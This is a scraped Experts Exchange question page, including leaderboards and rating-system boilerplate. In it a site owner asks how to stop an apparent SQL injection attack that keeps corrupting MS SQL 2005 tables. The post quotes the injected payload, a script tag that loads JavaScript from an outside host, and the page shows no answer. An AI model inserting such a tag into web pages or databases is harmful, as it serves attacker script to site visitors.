1. jahboite 64,763
2. rpggamer... 51,931
3. Admin3k 40,729
4. DaveHowe 26,972
5. richrumble 21,260
6. David-Ho... 20,736
7. MikeHolcomb 19,700
8. xmachine 19,684
9. warturtle 18,498
10. Mestha 15,850
11. breadtan 13,300
12. astralcom... 12,346
13. Roachy1... 11,000
14. TurboBorl... 9,204
15. arnold 8,274
16. dariusg 7,750
17. bbao 7,625
18. samsixty 7,500
19. Paranorm... 6,850
20. ahoffmann 6,464
21. IndiGenus 6,400
22. xxdcmast 6,006
23. tigermatt 5,822
24. uetian1707 5,784
25. hfraser 5,768

1. rpggamer... 259,364
2. jahboite 146,841
3. r-k 106,289
4. Sheharya... 99,699
5. IndiGenus 80,970
6. Admin3k 49,249
7. war1 46,771
8. Tolomir 43,070
9. richrumble 41,584
10. blue_zee 39,997
11. sunray_... 39,840
12. DaveHowe 37,432
13. David-Ho... 34,409
14. ahoffmann 31,903
15. ghana 29,660
16. rossfingal 27,308
17. johnb6767 26,074
18. PowerIT 20,727
19. rindi 19,919
20. MikeHolcomb 19,700
21. xmachine 19,684
22. arnold 18,524
23. warturtle 18,498
24. phototropic 18,339
25. LucF 18,113

	[x] Posted via EE Mobile
	Search, ask, and monitor your questions on the go with EE Mobile. Visit Experts Exchange from your mobile device and never be out of touch again.

05/16/2008 at 05:53AM PDT, ID: 23408074

	[x] Attachment Details

[x]

The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

The Grade of the Solution
The Zone Rank of the Expert Providing the Solution
The Number of Author and Expert Comments
The Number of Experts Contributing
The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

9.4

SQL Injection Attack - how to stop it once it's started??

Asked by BestAviation in Networking Security Vulnerabilities, MS SQL Server, SQL Server 2005

Tags: ASP, SQL, MS SQL 2005, www.bestaviation.net & aviationcareerguide.com

Hello,

I have fallen victim to an SQL injection attack (or what seems to be) and have had three Tables in a database corrupted with a script string reading <script src=http://www.banner82.com/b.js></script> and placing itself in every row and as many columns as it can.

I believe it may be caused by poor coding on my part (ie. not using parameterized coding in my SQL statements) but what I cannot figure out is how it manages to carry on. I have done the following preventive measures

1) Restored old Table in a new Table under a different name
2) Renamed every column in the new table

But before I have even managed to get around to changing the ASP code on my website to reflect these changes the data in the new table is getting corrupted!!

Only three Tables (out of many more) are affected but these are the three tables normally executed when a user is on my website - however the new table with the restored data has not been executed through my website yet at all! As far as any web user is concerned it doesn't even exist (I only just created the damn thing).

Can anyone give me a clue as to how it does it and how it manages to do it with such lightning speed???

No point restoring a DB if I can't stop it from corrupting itself the very next minute...

I use MS SQL 2005 on a Windows Server 2003 - my coding language is ASP

View the Solution FREE for 30 Days

Related Solutions: Cleaning Up SQL Injection Attack - http://www.banner82.com/b.js script

20091028-EE-VQP-87 / EE_QW_2_20070628

SQL Injection Attack - how to stop it once it's started??

Asked by BestAviation in Networking Security Vulnerabilities, MS SQL Server, SQL Server 2005

Tags: ASP, SQL, MS SQL 2005, www.bestaviation.net & aviationcareerguide.com

About this solution